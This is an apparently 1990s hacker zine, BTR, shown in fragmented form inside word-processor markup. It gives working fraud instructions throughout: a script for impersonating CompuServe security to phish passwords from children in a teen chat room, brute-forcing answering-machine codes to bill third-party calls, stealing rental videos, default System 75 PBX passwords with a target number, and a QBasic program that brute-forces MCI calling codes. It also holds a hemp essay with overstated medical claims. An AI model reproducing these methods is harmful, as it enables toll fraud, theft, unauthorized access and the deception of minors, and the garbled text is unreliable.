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  �   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ڿ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  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�����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ô   ���Ĵ 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Ŀ ���Ŀ ����Ŀ ���Ŀ     ��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 o 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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>I 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1/16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tin Luther King, JR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There Be Another Big Bell Crash To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lum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You can always find BTR on PsychoTron BBS OR AWoL (518) 383-136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BTR-0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 Of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      - Head Honcho -=- Master Programmer -=- substance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 Kill (RK) - Founder &amp;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on        - The Demon Knight -=- Head Of Format -=- treason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VMBs : (These will be updated as they go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 - [800] 775-0728 No Extension, Direct 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on   - [800] 775-0712 Extension : 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R Box   - [800] 775-0712 Extension : xxx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Kill - None That We K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BTR, it's Editors and writers take no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you learn from this mag. So blame it on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get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 HQ Sites : WHQ - Another Way of Life [AWoL] 518-383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Q  - PsychoTron BBS Systems [PBS] 919-PRI-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 - ftp.winternet.com  [/users/craigb/b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: Need A VMB? Well we here at BTR would be more than happy to setu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anyone a 800 VMB free of charge. Although we woo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or somethings in return. Not calling cards bu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boards, PBXs, internet account, you know small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e don't guarantee your VMB will last that long. We have giv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lasten 12 months, some 1 week. It's like New York lot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y, You never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: � Substance � Treason � Road K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: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Stomp Box � Spoonman  � Pliny The Elder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Ghostrider� Anarchist � Lizard Rock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rpheus  � Phive     � Twisted Imag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abotomy  � Firebug   � Vip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Ser       � Ice-9     � Malvolent Tricks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Rem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able of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 1 of 14 [*]  The All New BTR Magazine, Editors Note -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2 of 14 [*]  Hacking Compu$erve                     - Roa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3 of 14 [*]  Why The Hell Should Hemp Be Legalized? - Pliny The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4 of 14 [*]  Hacking Various Answering Machines     -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5 of 14 [*]  Prepaid Calling Cards                  - T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6 of 14 [*]  Renting Movies &amp; Video Games For Free  - T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7 of 14 [*]  An Introduction To Delrina Fax Mail    - T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8 of 14 [*]  The Guide To The IVX500 VMB System     - T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9 of 14 [*]  My Allnet Discovery                    - T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0 of 14 [*]  System 75 Defaults                     -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1 of 14 [*]  A Simple MCi Code Hacker In Qbasic4.5  -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2 of 14 [*]  Some 518-489 Scans                     -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3 of 14 [*]  BTR Shorts                             - The Who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4 of 14 [*]  BTR News &amp; Shit Like That              - Crew Of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lt;.ARTiCLE.1.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he All New Beneath The Remains Magazine / Editors No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Crew Of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fucking new year. And welcome to the new and improved issue of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s online zine. BTR, a local 518 magazine, which is always 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readers with illicit info, ranging from Pyroteknix, Phone Phrea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cking to Frauds and ways to get cool stuff for free. We the edito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R are here to help you do cool stuff, and it is hard to keep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nd keep the articles flowing.  So please send in ANY articles to AW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8-383-1369] pretty much anything you send in will be printed, rang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s to how to get laid on the first date. Hope you enjoy the mag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distribute this mag and add your bbs file or group ap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it like that don't make it too big and if theres that shi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ssue of BTR please feel free to delete it. We don't want this ma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dload so don't add to much. Here are some perks if you wan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r: Access to special writers-only teleconferences, access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n AWoL BBS, you get to see your name in this magazine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 If you want to become a executive writer you get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r own personal VMB. To become an exec writer you have to wr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t and help out a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.ARTiCLE.2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Hacking CompuSer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ad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beats all the other pussy texts on hacking compusrv..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re soo lame, with like 50 extra bbs ad's, to make it about 1 me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is only about 10k... Well fuck that, do this, I can garu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ll get some GREA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stretch out your Social Engeneering Capabilities. (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 lamers into their passwords)  1st get a fake trial account t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ake a form out of a new modem box and get the free compuserv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deal, form.... Oh yea, to use those you'll need weird shi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routing #, transit #, check #, bank name/#..... Also the other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&gt; Real fak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gt; Real fak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&gt; Real fake city/st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&gt; Real fake phone #/data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compusrv and once your all logged on type 'go cb' when you ge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B simul8r.  When your on the CB goto the general band, then I be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annel 17 (Teen Dorks).  On there, when it asks for your hand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nt to say a handle then [HELPER].  Use MIRROREYES, some dork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med about 1 million accounts with.  (yeah he is a real guy). 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RROREYES[HELPER] all in caps like so.  Once on the teen channel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how they are always saying shit like 16/f and 10/m... We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ullable 14/f or 10/m and (lets say there channel is #10)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:  Hello, this is Joe Crawford, from Compuserve Security Department,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9, we are sorry to inform you, but there are security breac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k : Oh really?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:  Well have you been using your account extensively for many ho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me, for the last 3 wee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k : No... Ive been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: Ok, well, we can set you up with a new ID and Password, but fir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verify some information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k :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: Name, Address, City, State, Phone, ID (even tho its in front of you),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k : Felix Johnson, xxx, xxx, xxx- 75053,1122 - PW: cleanse*butt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: Ok, thank you Felix, that information has been verified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orm in the mail, within the next 4-6 weeks confirming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.  Until then, you have a security block on your accou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an call except from your pho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k : Great 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*O*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hat account for about 2 - 3 months before they catch on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ice as much as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.ARTiCLE.3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Why The Hell Should Hemp Be Legalized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 Pliny The Elde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that marijuana should be legalized. It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uses, and has proven to be the "safest" mind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 you can put in your body. Marijuana has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medical, and individual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juana is an Indian hemp plant which can grow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d has been found growing in Arctic regions,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, and even in city dumps. It's scientific name is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va which comes from the Latin word for hemp and sativ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planted or sown (Leiberman 32). Marijuana was illeg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37, for mostly political reasons (The Benefits of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p is a renewable natural resource that yields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essential for more of our necessities and con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ther crop. Hemp grown on land in the United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urrently forested or used for agriculture can mee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il and gas fuel needs. Twelve to thirty-eight million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mp would provide enough fuel for all of ou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is would mean $0.60 to $1 per gallon fuel cos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One ton of American grown hemp can be converted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barrels of methanol. It is estimated that marijuan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en to thirty tons per acre. Using hemp to generat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veral advantages over current fuels. Hemp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, is grown as a crop, so it's a renewable energ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el products produce carbon dioxide when burned. Some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bon dioxide is contributing to the "greenhouse eff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radually warming the planet. Marijuana i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rop which effectively converts carbon dioxid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(America's Family Farms). Charcoal, pyrolitic oil, g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nol can be produced from cannabis hemp. Burning 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ause acid rain (Pulp &amp; Paper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juana is one of the best cash-crops that a far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. It is a rugged plant which has strong roots that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the soil to prevent erosion. Is requires less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lizers and pesticides than do other food and cash crop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, cotton, and tobacco. Hemp leaves drop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eason, helping to add to the fertile topsoil and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l retain it's moisture. Depending on how close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s are sown, hemp can help protect seedlings,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to eliminate weeds. Hemp is also a good crop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crops, since it helps fertilize the soil,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lot of chemicals which poison the earth (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Fa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abis hemp is the longest, most durable, and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 natural fiber known to exist on the Earth. Ninety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hip sails were made from hemp fibers since the bi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until the 1930's. Virtually all canvas pain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on cannabis hemp linen canvas. Ninety percent of all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ine was mode from cannabis hemp until 1937 (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1). Seventy-five to ninety percent of the world'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 before 1883 was mode from hemp fiber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drafts of the Declaration of Independence. In 191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Department of Agriculture predicted a paper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or portions of the hemp stalk. They stated "Hemp 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cts similarly to soda-poplar stock, but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harsher and stronger sheet and one of higher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" A three page article appeared in the February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Popular Mechanics entitled "The New Billion Dollar C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d a breakthrough in removing the fiber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 from the rest of the hemp stalk. The article stated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gulations can be drawn to protect the publi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the legitimate culture of hemp, this new crop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 to American agriculture and industry." Hem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our times the amount of paper per acre than 20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will grow anywhere in the 48 contiguous states (Pul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than 3,500 years marijuana has been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drugs in oriental medicine. From 1842 to the 188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was one of the most often used drug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o treat the illnesses of adults and children.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(1966 through 1976) reconfirms marijuana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of choice for glaucoma, epilepsy, muscular spa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tumors, control of nausea in cancer chemothera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ysema, migraine, depression, and anorexia nervosa.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glaucoma victims can benefi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. Marijuana is two to three times as effectiv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egal medicines for reducing ocular pressur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 side effects associated with legal glaucoma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is also one of the best dilator of the bronch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nchoiles, opening them up to allow more oxygen into the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research indicates that light marijuana smok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rapy of choice for mild emphysema to allow mor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bronchi to open up for more oxygen transf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to the oxygen transfer effects caused by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chest pains, shallowness of breath, head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ich are symptomatic of heavy smog exposur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d by light smoking of marijuana throughout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is the best natural expectorant to empty the lu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. It's estimated that marijuana would replace more than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Valium, Librium, and Stellazine. Marijua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best way known to dry one's mouth for dentis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legal would replace the highly toxic Probant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is also the best relaxant and back spasm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ort of morphine (The Benefits of Cannabis 2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 beneficial effects of marijuana are ign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, the question of legalization is still an easy on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federal, state, or local has any right to te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at he can or can not do to his body.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has a responsibility to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 that might be harmful to them. It migh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able that governments have a right to protect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that they can not perceive, such as dang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cide. Instead of letting the populace decide for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government is deciding for them.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ying that they don't trust John Q. Public to make up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and that they must remain every vigilant over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him from every possible harm in the world.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Government apparently doesn't want a free thinking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eople can make up their own minds. Aspirin causes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s a year. During the entire record of human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ingle death has been caused by cannabis (Young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nefits of legalization of cannabis sativa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merable. There has not been a single death related to he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recorded history. What possible reason can anyone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the citizens of the United State's right to use God'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to the fullest? Sure, the chronic smoker wo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ee ride, but they know that and i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Hemp must be legalized for commercial and med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the purposes of the individual. Who will de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ace the great benefits that can come from this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b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Cannabis. Peacenet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erman, John S. Plants that grow Wild. New York: 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en way to Save America's Family Farms.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Alliance for Commerce in Hemp, N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 Francis L. Cannabis/Marijuana's Accepted Safe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edical Supervision. New York: N.p.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 Jim. "It's time to reconsider hemp." Pulp &amp; Paper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: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.ARTiCLE.4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acking Various Answering Machin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wonderful world of answering machine hacking,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  first  tell you a bit about what the hell the purpose of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ing machines is.  Here is some purpo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Free Calls (3rd par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Chicks Dig I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You can use it as a cod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 answering machine, you need the IQ of a dog (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try, dont bother).  Once you find it, and start hear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*, if that works and it brings you straight to the BEEP, then krad, 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.  If not, dont bother hacking it, it wont even let you access it remo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answering machine to hack is (518)383-1111 Jesus, i must have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uys code 400 times, everytime he'd change it, id get it :&gt;  Now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s are only 2 digit passwords, some 3, and a ver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(which really isnt needed for an answering machine) w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4 digits...  Once you hear the beep to start recording, start with 00,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h yeah, a big button phone for blind people is suggested for this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 haking ans. mach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1 02 03 04 05 06 07 08 0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2 13 14 15 16 17 18 19 2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23 24 ....................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listening closly to the earpeice while you dial these..  You sh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ep, then the messages that were previously recored play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x, if you hit a good one, it will have a audiomated voice, s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g out options. Like * for help, 1 to hear messages, 2 to delet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o Change outgoing announcment, 4 to logout (Alltho not in those exact we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 where the making free calls comes in... Hit the number that you h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utgoing announcment, when you hear another BEEEPPP then say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Operator I except all 3rd party and Collect Calls  ........ Hi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&gt; at &lt;the # of the hacked house&gt; please leave a message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save (usually, unless told otherwise, Earlier)... The ver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this shit is, that if you call the operator and say 'I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3rd party call to (npa)xxx-yyyy, my name is Rick'  They will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The party verified, thank you for abusing AT&amp;T &lt;click&gt; '  Whala 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4 free..  Even tho there bill wi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3rd party bill from (yer)num-ber to (cal)led-party'  You CANNOT and i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introuble, say you didnt do it, AND even if they prove i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, what the fuck can they do!?!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as a code line, if its 8oo, which are kinda hard to come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f with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.ARTiCLE.5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An Overview Of Prepaid Calling Car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 xml:space="preserve">First Release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 xml:space="preserve">ĳ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�����reason� {518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 xml:space="preserve">ĳ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ly in the past few months or so I have noticed a rathe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unt of Prepaid Calling Cards being distributed. A Prepaid Call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alling Card that all you do is pay for it and it has a special am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slotted. I thought this would be a particularly useful topic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ince it can aid all phreaks and hackers. Lets say I went to Joe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ve them $15. In return I would most likely recieve a 10 or 15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card. In this article I am going to focus on mainly a few that I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some about. I have only seen PCCs in intervuls of 7, 10, 25, 3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minute cards. And all of these cards have 1 thing in common. An ann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ll bitchy voice comes on when theres one minutes left on your PC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that. That fucks up any modem connection if any. Plus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re open 24/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s a new company called Talk 'N Toss. They are offering 30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90 minute call cards to resalers. So if you wish to place a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m at your business dial their customer service toll-phree ho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00) 631-8895. Plus i'm sure you can SE the lady into getting fre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it once so it can be done. This call doesn't appear on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. They say it saves 38% from a normal AT&amp;T Call Car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seen these selling only two places. The first is a groc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in Colorado called Albertsons. I don't know if this grocery sto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 Colorado, but thats just where I have happen to run across it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s Revco drugstore formerly Brooks. They have 10 minute card for $3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20 minute card for $9.99(?) and a 30 minute call card goes for $9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a 90 minute phone card goes for a whopping $24.99. Deal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uck with 'em call (800) 213-0304, in the form XXX-XXX-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stomer service # at (800) 354-270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vel Comics and Kay-Bee toys have put together a deal to sel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X-Men calling cards. They have 4 so called limited edition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ussy's fighting on the front. On the back there is a card and a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rea to see the card number. To further expirement call (800) 616-88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are 9 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mps Sporting Goods Store has a new deal where if you purcha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5 worth of shit you get a free 7 minute call card. 7 minutes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worth shit. But for some things it is. The number is (800) 437-6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have 9 digits in the form : XXX-XXX-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domly inserted into Classic 4-Sport, sports cards are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Prepaid FoNCARDS. Now what the fuck would some baseball card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paid FoNCARD? I still haven't figured it out. But Sprint has som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assic Games Inc. The odds of finding a Sprint FoNCARD is 1:72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for how many minutes they are for or how many digits they ar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anything I'll keep you po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Classic is trying to offer something to the collector agai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it's about real money. Not opening a $1.50 pack of cards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ffering 1, 5, 10, 20 and 1000 dollar cards to dealers. These are such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ies that the prices double every quarter! So I asked some rip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what the deal was on getting it he said for a $1000 card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750 downpayment with a max order of 1. But the rest you have to orde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the rest to order them wholesale. That's 108 cards a case.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an find them singular. Try looking in your local sports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for Sportscard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sports fans once again. GTE is offering 25 minute c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 like actual calling cards. But these cards you can orde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esional football team helmet logo on the front of it. They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L Collectibles". But the minimum order is 2 cards. Plus then they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minute bonus card that features helmets from all 30 NFL teams.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is only $14.75 but you have to get 2. Call 1-800-GTE-3804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 And outside the US call (303) 743-4138, extension 712. Or just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-727-4994. You must order these with a credit card. I saw this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lmark is also working with Sprint to rip you off for the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They have 10 minute call cards which are poly-wrapped insid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Now for the Christmas season they have tighter wrapped Christma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These sell for $5.95 at you local Hallmark store. But I happen t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rds the best since they're easier to ripoff. Go ahead hack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00) 504-1115, or for the same plus a Happy Holidays greeting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203-1225. Either way it works. They are 10 digits in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-XXX-XXXX. Their customer service/questions toll-phree hot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16-2121. You can only call US plus US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psi Cola company is the stupidest asses for printing the phon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calling card system on the back of any 12 pack box. Pepsi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tiest cards but spent the most on advertising. They have a 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ard randomly inserted into Pepsi Holiday 12 packs. So just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(800) 929-COLA or (800) 929-3652 (same) and it says "Enter Your 14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". It's just asking to be ripped off. But if you think a Hallmark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card isn't worth it then fuck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11 the slurpee guys are now working with AT&amp;T to bring you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-11 Phone Cards. It's supposed to save 50% or more. Now I know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 of shit. On the brochure it shows a data table comparing a 3 minut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A to NY. It says a 7-11 Phone Card is $1.00, Collect Call is $3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hone is $2.70, and a Call Card is $1.70. I know when I call LD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5 or close to the cents a minute, not this ripoff. The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5, 30 or 60 minute cards. I found a nice sales pitch on the brochu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After your time is used up, the card becomes inactive and you jus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ard!", yeah right. With this card unlike the Hallmarks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But this call must originate from within the US.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ates vary a 15 minute card could only be 5 minutes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give you that ammount of time. It depends where you call.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o you have a certain ammount of money credit and once that's used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minutes are left your time is up. Remember when you want a 7-11 ca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best to ask for Hab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ose #'s and how many digits your suppos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n Toss Customer Service (800) 631-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n Toss/Revco Cards      (800) 213-0304 - 1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n Toss/Revco/CS         (800) 354-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en/Kay Bee Toys           (800) 616-8883 - 9 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 Sporting Goods        (800) 437-6404 - 1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                        (800) 929-CoLA - 1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mark/Sprint              (800) 504-1115 - 1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mark/Sprint/Holidays     (800) 203-1225 - 1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GTE Football Cards  (800) GTE-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GTE In 303 NPA      (303) 743-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GTE In 303 NPA Fax  (303) 727-4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.ARTiCLE.6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enting Movies &amp; Video Games For Fr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 xml:space="preserve">ĳ�������Ŀ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 xml:space="preserve">reason� {518}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ĳ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eason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ant to be able to go to just about anyvideo store or grocer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some free movies and video games that are NEVER due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Yeah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ways to pull this one off. At places where you ei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1.&gt; Return Videos To Counte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2.&gt; Return Videos Through Drop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3.&gt; Stand Outside While Pretending To Wor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1.&gt; Return Videos To Counter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nd a place where you can rent movies or games. Video stor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easiest targets. Grocery stores are up there to.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store where when after a person rents a movie they have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untertop and a person who works there will pick it up and pu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/she has time. Most people who work at video stores are either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 or overwelmed with work. You don't want to be in a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 is watching Benji Comes Home 24/7. You want a nice quick busy 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Now the goo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erson finished their movie/game and set it on the counte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go to the area to put it back. But it theres people trying to tak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 at the same time they do it once the active customer is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ere you come in. Hang around a video store for a while so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atmosphere in a way. Find a good area to pretend to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vies but where you can see the cashier and renter. Pick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7PM to closing is usually one of the best. Once you have atleast a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line and a pile of videos starting to build that's where you mo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ver. You don't have to be stealth just act like your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 recently dropped in. If anything looks semi-interesting just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hands with the video in them down to under the count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e behind it can't see the flick you have in your hands. Now you w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, turn around and walk to some other section of the store.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of viewing anywhere in your clothing you want to. Then just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is work mostly. The key thing is all in the right tim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goods you can watch them, sell them or bur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.2.&gt; Return Videos Through A Dropsl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method is still easy but it takes a little more brains.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s of dropslots. The first is a downward slot through somewhe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or table where the stuff drops into a box or something.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a little door you open then drop the videos in, plus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see the pile of videos on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dropslot situation you can find something like a litt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or metal you can slip in to stop videos from going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Then once they have put their shit on in you can just reach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'em. Another idea is take a hanger and unfold it so it's stra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ne side so it sort of locks around one edge and wedge it dow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stop the flow of videos, then hook the other side to the other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ill catch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iagram demostrating how you can fit something in to stop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s. The rectangle in the middle is the dropslot, and the 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hangar. I have it at a slant to you can better pict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�������������������������������������������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�                   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�                   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�                          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��Ŀ                                                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�  �                                              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�  �                                              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�����������������������������������������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/   �                                                � /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/    �                                                �/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/     �                                                /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/      �                                               /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/       �                                              /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/        �                                             /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/         ��������������������������������������������-/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                                                      /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                                                      /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                                                       /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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/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3.&gt; Stand Outside While Pretending To Wor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fairly large cardboard box and write video drop on it in mark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e your going to victimize has nametags, then make one with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for you, or steal one. This betterly works at videostores,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I don't recomend trying this in cold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outside and as customers walk to the door tell them that your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service and collecting videos outside so they d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 If they say they're going inside anyways it's best to sh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because you don't want people complaining about a fake employe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collect as much as you want until you hear sir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.ARTiCLE.7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An Introduction To Delrina Fax Ma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ĳ�������Ŀ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�����reason� {51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ĳ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BEGIN�ADD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rina Fax MailBox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where you are, where your're headed, or what time it i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e certain you'll get every fax people send you �- even if the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re to find you. With new Delrina Fax MailBox service, it's easy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we're so sure you'll agree, we're going to give you one mon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10 fax pages free. Now, confidential and reliable fax sto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wo easy set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One: Someone needs to send you a fax, so they dial your toll-free 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which we give you) and it goes. Then Fax MailBox recevie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 electronically until your ready to retr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two: You use your PC or laptop with a fax modem and Delrina WinFax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software, and retrieve your fax with a simple click of the mouse.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x machine, enter your password, and print it on the spot. It'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nk of Fax MailBox as voice mail, but for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oday and sign up for Delrina Fax MailBox and you'll start ge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xes �� for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rina FaxMailbox 1-800-238-8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END�ADD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ally what this system is a VMB but for faxes. So it's a F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can do with this is have someone send your FMB a fax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enter you password and retrieve it. It can be good for hackers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back and forth exchange of eli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that number for the a month free. If you registe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ias and tell them not to call you or give them a number that'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 Remember this your service is only cut off when you cancel it.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an keep on going and going and going with bills being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I ran across a Delrina Fax MailBox number by accident, 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1-800-368-9414 and then the next few numbers are assigned to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hack the password. (That whole 1-800-369-94xx is loaded with the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mber gets their own 800 number an operator t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basically know a little but this is good enough for some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.ARTiCLE.8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 xml:space="preserve">AirFon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&lt;.ARTiCLE.8.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/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\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IVX500  Voice Mail Users Gui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\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/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reason� [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eason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VX500 Voice Mail Users Guide. I know someone tha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this system for his office and I got a handy manual.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t over and decided certain things just needed to be known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told most people that I was typing this up they though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 to a 6,000 page document, like a Meridian Mail. But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s efficent and you will find all of the command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1.&gt; Introduction To IVX500 Voi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2.&gt; Entering And Initialinzing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3.&gt; Listening To And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4.&gt; Pers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5.&gt; Remote Messaging And Us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6.&gt; Where Can I Find Thi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1.&gt; Introduction To IVX500 Voic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VX500 System has a Voice Mail feature that allows callers to s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 recorded messages from any station or touchtone telephone. (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al-pulse phones can be routed to the operator for assist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users and outside callers reach Voice Mail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dialing the telephone number or extension number assigned to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being transferred to Voice Mail by the automated att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y being forwarded (using manual or system forward) to Voice Mail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station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y responding to message waiting indications left by Voice Mail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. (Not available with some telephone systems and station instr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ach Voice Mail, you wil hear recorded instructions that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 next. Simply listen to the prompts and press the keypad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desired choice. If you do not respond immediately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ompts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mpts are interruptible, and you can press the desired ke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mpt. The prompt will then stop and the system will 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oice Mail user can be assigned a unique Voice Mailbox numb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 of mailboxes: Standard, Receive-Only, and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tandard mailbox features include: listening to new messages,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s, forwarding messages, deleting messages, saving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personal options, and if authorized through databa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remote mess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Receive-Only mamilbox user can only listen to new messages, sav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program pers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ystem Administrator has all of the Standard mailbox options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ility to record and send broadcast messages, provide mailbox and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maintenance, and record and select custom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telephone systems, your station is signaled when your mailbox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 If you have a keyset the MSG key lights and the display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ha been received. If you have a single-line set, the MSG key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ear message waiting signals(ie 6 tones) when the handset is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essage waiting indications (lights, displays and signals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ertain telephone systems and station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tation has more than one associated mailbox, the message in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until all messages from all associated mailbox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 However, the display does not show which mailbox has recieved the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essaging can be enabled or your mailbox through databa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up through your mailbox. It allows you to enter the primary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rough your mailbox. It allows you to enter the primary and/o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number or extension number that the system will call whe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recieved by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2.&gt; Entering And Initializing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your mailbox, the system mayi play one of the following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AILBOX ALMOST FULL OR FULL: If your mailbox is full, no new mess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cieved unitl you delete waiting or sa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ESSAGE COUNT: The system tells you how many messages are wait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d, if any and how many are priorit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TE MESSAGING: The system will indicate whether primary o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messaging is selected when remote messaging is enabled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ert you if a programming error has been detected and/or wheth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busy sytem resources when attempting to place a remote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MAILBOX BY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Dial the Voice Mail access number. (You hear the Main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uring or after the greeting, press * to identify yourself as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nter yourmailbox number and yoru personal password (if programmed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SG KEY IS LIT AND YOU HAVE A MESSAGE FROM VOICE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ess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f required, enter your mailbo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nter your personal password and press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use your mailbox, you must initialize it (set i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s will instruct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the default password number to a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ord a name to identify yourself in the comp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isten to the Voice Mail application introduction. (You can't ski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 If you exti without listening to it, the introd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gain the next time you enter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YOUR MAI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al the Voice Mail access number. (You hear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ee * to identify yourself as a subscriber or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nter your mailbox number and default password. (Your default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box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IF YOU WANT A PASSWORD, enter a new password using digits 0-9, up to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though. Then press #. Voice Mail plays back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a password press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ess # to accept the entry. (Or press 3 if you wish to reenter the p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prompts you to record your directory n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fter the tone, record your first and last name. When finished press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ess # again to accept the name. (Or bang 1 to replay the nam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without saving, or 2 to add to your name, or press 3 to e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reco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The sytem then plays a prompt that introduces you to basic Voic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 (You can't skip this tutorial. If you exit without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the introduction will play again the next time your enter your mail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3.&gt; Listening To And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enter your mailbox, you are told how many new and sa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nter your mailbox as described on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EITHER, Press 1 to listen to your new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Press 3 to listen to your sa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The system plays each message in the queue selected.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ing to a message, you can us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1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2 to pause. (Then press any key to contin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3 to skip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4 to lower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5 to play the message envelop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6 to rais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# to skip to the end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en the message has finished playing,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1 to replay the messag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2 to reply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Press 3 to forward a copy of the message to another subscriber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introductor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4 to listen to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5 to play the introductory message "envelope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6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7 to save the new message in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9 to delete the message from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nter your mailbox as described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e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al the desired mailbox number or group li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fter hearing the subscriber's name, press # to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en you hear the tone record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o pause while recording press 2. To continue press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erase and re-record your message pres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ITHER, Hang up to se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Use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1 to replay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2 to ad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3 to erase and re-recor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ITHER, Press # to se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, Press 1 to use the special delivery options. You can perform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f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1 to mark the message "private" to prevent the recipi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2 to mark the message "certified" if you want to recieve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ress 3 to mark the message "priority" to place your message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waiting messages in the recieving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* to cancel deliever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# to delive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fter the message has been sent, you may hang up or choose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1 and enter another mailbox number to send the mess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#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4.&gt; Pers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Options allow you to customize your mailbox. Voice Mail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ers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ings: Your primary or alternate greeting is played to call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each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Name: Your recorded name is used to identify you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verify your mailbox number when messages are addressed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ubscribers and othe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assword: Your password is ued to prevent unauthorized acces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Envelope Contents: Each message is preceded by an "envelop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can be programmed to include time/date the message was lef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the message, and/or the length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Pers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nter your mailbox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ess 4 to select Personal Options Menu. You may then perfrom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Your Personal Gr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EITHER, Press 1 to record and/or enable your primary g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OR, Press 2 to record and/or enable your alternate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OR, Press 3 to enable the system default mailbox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If you pressed 1 or 2, the greeting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THER, Press # to accept the greeint. (Or, press 1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y the greetiing, press 2 to add to the greeting, or press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and re-record the gree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Press * to exit without changing the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Your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2. Your current name is played. Press 1 to replay your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3 to erase and re-record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When you hear a tone, record your first and last name, then press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 xml:space="preserve">Press # again to accept your recorded name. (Or, press 1 to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coreded name, press 2 to add to your name, or press 3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-record your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You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Enter a password using digits 0-9 (up to 12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#. Voice Mail plays back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# to accept the password as entered. Or, press 3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and re-ente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Your Message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o enable or disable the time/date option, pres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o enable or disable the message source option, pre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o enable or disable the message lenght option, pres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o enable all options, pres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o disable the envelope, pres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o accept the envelope, press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o return to the Persoanl Options menu without changing the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5.&gt; Remote Messageing and Us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MESSAGING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Remote Mess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Enter your mailbox as described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 xml:space="preserve">Press 1 to set up a Primary destination or press 2 to setu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destination. You then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Remote Messaging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If Chosen press 1 to enable pager notification or 2 to ena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fication. Then, press 1 to have it notify you for any new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ess 2 to have it notify you on priority mess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Or Change The Tele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Dial the telephone number, then press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The Time Of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When prompted, enter the time at which you wish to ha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start and stop. Enter the times with two dig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ur and two digits for the minutes. (If you wish to have conti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, enter the same time for the starting and ending. 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time in the 12-hour format you will be prom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for AM or press 2 fo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The Days Of The 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1 for messagin Monday-Friday, press 2 for all days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select individual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If you selected individual days, you will be prompted to press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-7 which correspond to the days Sunday through Saturday. (ie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1) Press # to accept the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and extension number directories can be used any tim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enter a mailbox number. You use the keypad keys on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ame. The system then plays the closest matching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s to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Dial the Voice Mail ac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ss # for Directo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Enter the desired name by pressing a single key on the dial p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etter of the name, then press #. (The letters match thos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key. for example pressing 2 to enter A, B, or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hear the system play a helpful prompt instructing you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name, press 0 at any time while spelling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he selected name is played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o accept the name press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o hear the previous name in the directory, pres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To hear additional information for the selected anem (if allow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o hear the next name in the directory, pres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o spell a different name, press 4 and spell a new nam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o switch the first/last name sort order, pres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6.&gt; Where Can I Find Thi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you the truth I don't know. There is no way of identify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om any other. Except for the fact that you cannot get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that it is an IVX500. So good luck and happy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.ARTiCLE.9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My Allnet Discove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 xml:space="preserve">ĳ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�����reas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 xml:space="preserve">ĳ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I was trying to call up Hallmark on their Holiday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use their Prepaid Calling-Card service. But I could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 knew it was around (800) 203-12xx. So I tried 35 as the xx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ure would work and I hear the sweet sound of the Allnet ope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voice echoing through my phone "Please Enter Your 4 Digit P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, I thought sounds like a PBX. I didn't know anything about it a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entered 9999 as the PiN. When the operator's voice echoes "Thank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right now I'm feeling pretty good I found a PBX and got the co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. Well it wasn't the right code I wanted. It forwared me to All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Automed System. Once you get to this hit 2 for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ervice. On that you can find out your account bala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et account number which if you can hack can get you free cal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tender which I will explain later in this article. You can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ind out dialing sequences for dialing domestic and international.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useless shit like finding out mailing addresses to whe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ills. This service can be reached without going through a PBX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36-32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back to the PBX hacking. After that customer service discove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 number. Then I hear enter my 4 digit PiN again. The second try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gain and hear "One Moment Please". I thought jackpot. But then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enter a valid Pin for placing your call". Rats foiled again.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knew it was a PBX. I was thinking how lucky I was to have found a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ass telco so luckily. Little did I know theirs a mill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And some are fucked up so after entering 2 invalid pins i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omeones residence! Incase your wondering one of those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THE-KRAD (843-5723). At the end of this article will be a sma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ir extender just dial on up (800) 783-1444. Then with you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tone phone dial that numbers. Then at the first single tone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NPA-PRE-SUFF. You can call international. Then at the second double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11 digit Allnet account number and your call will be bi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ne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00) xxx-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203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THE-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68-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68-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00) 868-13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68-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68-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68-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68-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68-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68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68-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68-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68-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68-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00) 325-407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.ARTiCLE.10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System 75 Default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       custpw      - Highest acct priv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t      rcustpw     - Restricted cust acct (Still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    browsepw    - Pretty Much s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   looker -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      rw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   loca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       fie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s      i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s      in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s      ina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suppo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       bc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m      bci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    enqui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in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       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       bc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     cra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    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bl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found a few in 518, but we aint giving them out, cause if we d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out 500+ wanna be 518 hackers fucking it up for us...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one in 5o3.... here ya go 5o3-223-5340, it still uses cust and r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fualts, so you can check it out..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.ARTiCLE.11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mple MCi Code Hacker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prog out, i wrote this with some spare time, you sh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rrect comport for the comport given defaulted.  Exaclty w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, call the 95o-1o22 # (For MCi's PBX) and dial in a random MC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starting 0's and 1's) Then will dial a # that will never b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dem obviously (like i think it's compusrv) Then wait a few se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ee's the word CONNECT it writes the code to file.  All tho this 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ccurate way of hacking MCi codes, this has about a 10 out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getting home.. Try it out, if your not completly satisfied, fu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GOTO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$(3) = "14"  ' COD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$(8) = "40"  ' SECONDS TO WAiT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"COM2:2400,N,8,1" FOR RANDOM AS #1: OPEN "CON" FOR OUTPUT AS #2: OPEN "VALIDS.DAT" FOR APPEND AS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1: PRINT " MCi LD K0DE H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1:  PRINT "�"; : COLOR 9: PRINT " iNiTiALiZiNG MoDeM ": PRINT #1, "ATS11=80": SLE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3:   PRINT "�"; : COLOR 9: PRINT " DiALiNG MC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$ = "": Q$ = ""            ' CLEAR MODE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S$ = ""                      ' CLEAR RANDOM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4, 1                                         ' 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L = 1 TO VAL(HACK$(3))                         ' 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INT(RND * 10)                               ' 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L = 1 AND X = 0 THEN X = INT(RND * 9 + 1)   ' [ GENERAT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$ = STR$(X)                                    ' [ RANDOM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$ = RIGHT$(X$, 1)                              ' [ #'S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S$ = NUMS$ + X$                              ' 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DL                                            ' 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"HACKiNG CODE " + NUMS$                      ' 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#1, "ATDT9501022,,,,0-8012501600,,," + NUM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ime =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$ = CHR$(27) THEN CLOSE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 = INT(TIMER - Star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$ = INPUT$(LOC(1),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$ = TOTAL$ + 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$ = CHR$(27) THEN CLOSE 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TR(1, TOTAL$, "NO CA") &gt; 0 THEN PRINT "NO CARRiER": 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TR(1, TOTAL$, "CONN") &gt; 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: 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TR(1, TOTAL$, "CARR") &gt; 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE 